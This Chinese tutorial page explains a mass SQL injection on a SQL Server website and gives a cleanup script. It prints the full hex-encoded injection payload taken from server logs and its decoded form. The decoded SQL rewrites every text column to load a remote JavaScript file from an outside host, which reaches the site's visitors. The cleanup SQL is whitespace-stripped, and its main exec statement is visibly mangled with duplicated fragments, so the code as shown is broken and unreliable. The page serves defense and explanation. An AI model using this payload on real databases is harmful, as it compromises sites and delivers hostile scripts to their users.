关于注入(css/c.js)

2016-02-19 19:49 32 1 收藏

今天图老师小编要向大家分享个关于注入(css/c.js)教程,过程简单易学,相信聪明的你一定能轻松get!

【 tulaoshi.com - Web开发 】

  这几天朋友的网站天天被搞破坏的人恶意注入,也许是程序没写好的原因,数据库每个字段加了一段script(Script Src=http://%63%2Enuclear3.com/css/c.js/Script,而这个script地址时不时的有变化)。用一些搜索引擎搜索下:/css/c.js/Script,发现好多网站居然都有这个问题。通过iis日志捕捉到注入的原型是以下形式:

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt
  
(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000
  
4300200056006100720063006800610072002800320035003500290020004400650063006C00610072006500200054006100620
  
06C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063
  
007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F006
  
2006A006500630074007300200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200
  
6500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D002700750
  
02700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E005800740079
  
00700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002
  
E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F00430075007200
  
73006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C00650
  
05F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040
  
004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078006
  
50063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B002700
  
2B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007200740028005600610072006300680
  
0610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C005300630072
  
0069007000740020005300720063003D0068007400740070003A002F002F0063002E006E00750063006C0065006100720033002
  
E0063002500360046002500360044002F006300730073002F0063002E006A0073003E003C002F00530063007200690070007400
  
3E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0
  
065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C
  
006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007
  
400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--

  上面cast里面sql语句解密如下:

Declare@TVarchar(255),@CVarchar(255)
DeclareTable_CursorCursorForSelectA.Name,B.NameFromSysobjectsA,SyscolumnsBWhereA.Id=B.IdAnd
A.Xtype='u'And(B.Xtype=99OrB.Xtype=35OrB.Xtype=231OrB.Xtype=167)
OpenTable_CursorFetchNextFrom Table_CursorInto@T,@CWhile(@@Fetch_Status=0)
Begin
Exec('update['+@T+']Set['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''Script
Src=http://%63%2Enuclear3.com/css/c.js/Script''')FetchNextFrom Table_CursorInto@T,@C
End
CloseTable_Cursor
DeallocateTable_Cursor

  总结:

  还是程序没写好的原因,会导致注入,希望今后写程序能注意这个问题,不过想想用dotnet那种参数化取值,注入的可能性应该为零了。

  因为这个朋友最怕数据丢失,希望恢复数据,于是我就帮他写了一个清理字段的sql脚本(只适合sqlserver)。呵,也希望给那被注入的网站的清理提供方便。代码如下:

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  declare@nameasnvarchar(128),@columnNameasnvarchar(128),@columnTypeasnvarchar(128),@injectSqlasnvarchar(111)
  set@injectSql='ScriptSrc=http://%63%2Enuclear3.com/css/c.js/Script'
     DECLAREcurLabelCURSORFORselectnamefromsysobjectswherextype='U'
     OPENcurLabel
     FETCHNEXTFROMcurLabelINTO@name
     WHILE@@FETCH_STATUS=0
     BEGIN
  DECLAREcurLabel1CURSORFORSELECTColumn_name,data_typeFROMINFORMATION_SCHEMA.COLUMNSWHERE(TABLE_NAME=@name)
  OPENcurLabel1
  FETCHNEXTFROMcurLabel1INTO@columnName,@columnType
  WHILE@@FETCH_STATUS=0
  BEGIN
  if((@columnType='text'or@columnType='ntext'))
   --print1
   BEGINTRY
   declare@primaryKeynvarchar(255);
   SELECT@primaryKey=primaryKeyfrom
   (select
    c.nameasprimaryKey,
    casewhenc.colidin(selectik.colid
    fromsysindexesi,Sysindexkeysik,sysobjectsoo
    wherei.id=ik.idandi.indid=ik.indid
    andi.name=oo.nameandoo.xtype='PK'--主键
    ando.id=i.id
    )then1else0endisPrimaryKey
    fromsysobjectsoinnerjoinsyscolumnscono.id=c.id
    whereo.xtype='U'
    ando.name=@name)astwhereisPrimaryKey=1
   exec(0begin;set@Position=@Position-1;updatetext'+@name+'.'+@columnName+'Position@len'''';select@Position=patindex(''%'+@injectSql+'%'','+@columnName+')from'+@name+'where'+@primaryKey+'=@id;end;FETCHNEXTFROMcurTextINTO@ptr,@id;END;CLOSEcurText;DEALLOCATEcurText'">'declare@ptrvarbinary(16);declare@idnvarchar(16);declarecurTextscrollCursorforselecttextptr('+@columnName+'),'+@primaryKey+'from'+@name+';declare@Positionint,@lenint;OPENcurText;FETCHNEXTFROMcurTextINTO@ptr,@id;WHILE@@FETCH_STATUS=0BEGIN;select@Position=patindex(''%'+@injectSql+'%'','+@columnName+')from'+@name+'where'+@primaryKey+'=@id;while@Position0begin;set@Position=@Position-1;updatetext'+@name+'.'+@columnName+'Position@len'''';select@Position=patindex(''%'+@injectSql+'%'','+@columnName+')from'+@name+'where'+@primaryKey+'=@id;end;FETCHNEXTFROMcurTextINTO@ptr,@id;END;CLOSEcurText;DEALLOCATEcurText')
   ENDTRY
   BEGINCATCH
   print(@name+'.'+@columnName)
   ENDCATCH;
  else
   if(@columnType='nvarchar'or@columnType='varchar')
   exec('update'+@name+'set'+@columnName+'=replace('+@columnName+','''+@injectSql+''','''')')
  
  FETCHNEXTFROMcurLabel1INTO@columnName,@columnType
  END
  CLOSEcurLabel1
  DEALLOCATEcurLabel1
     FETCHNEXTFROMcurLabelINTO@name
     END
     CLOSEcurLabel
     DEALLOCATEcurLabel

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

来源:http://www.tulaoshi.com/n/20160219/1621862.html

延伸阅读
标签: Web开发
群里的兄弟问的效果 无标题文档 p.p1{ background-color:#FF0000;font-size:22px;_ font-family:"方正舒体"; font-weight:100; } hello,this is a example of stylesheets hello,this is a example of stylesheets [Ctrl+A 全选 注:如需引入外部Js需刷新才能执行] 网上搜到的不错的控制css JS控制样式 ...
标签: Web开发
动态加载外部CSS与JS文件使用dom创建script或者link标签,并给他们附加属性,如type等。然后使用appendChild方法把标签绑定到另一个标签,一般是绑到head。 应用: 1、提高代码的复用,减少代码量; 2、添加一个javascript控制器和 session可以实现动态改变页面样式; 3、由于是页面是从上到下依次加载文件的,并且...
标签: Web开发
WEB标准 是一系列标准的集合,并不是仅DIV CSS布局就可以实现。以CSS网页布局只是标准的基础之一。DIV CSS布局只是一种通俗的称呼罢了。而我们学习的目标在于以XHTML建立良好的语义化的结构,结合CSS最大程度使表现与内容相分离。 一位网友对W3C标准、重构与CSS布局的理解: 不知道从什么时候开始,在网络上到处可以看到div css,...
标签: Web开发
做项目时自己写一段js给大家。关于文本限制字数的问题,在实际开发中经常用到;主要问题出现在对中文的限制,下面代码就解决关于限制字节数的校验问题;只要将此下代码保存到一个js文件中并引入到校验的页面中,便可使用!同时希望大家给与大力支持和宝贵意见,本人会在今后闲余之际,发表更多的好文章,谢谢!! /*  value: 值; ...
标签: Web开发
代码如下: Function RemoveHTML(strHTML)'过滤HTML代码的函数包括过滤CSS和JS StrHtml = Replace(StrHtml,vbCrLf,"") StrHtml = Replace(StrHtml,Chr(13)&Chr(10),"") StrHtml = Replace(StrHtml,Chr(13),"") StrHtml = Replace(StrHtml,Chr(10),"") StrHtml = Replace(StrHtml," ","") StrHtml = Replace(StrHtml,"","") D...

经验教程

492

收藏

59
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部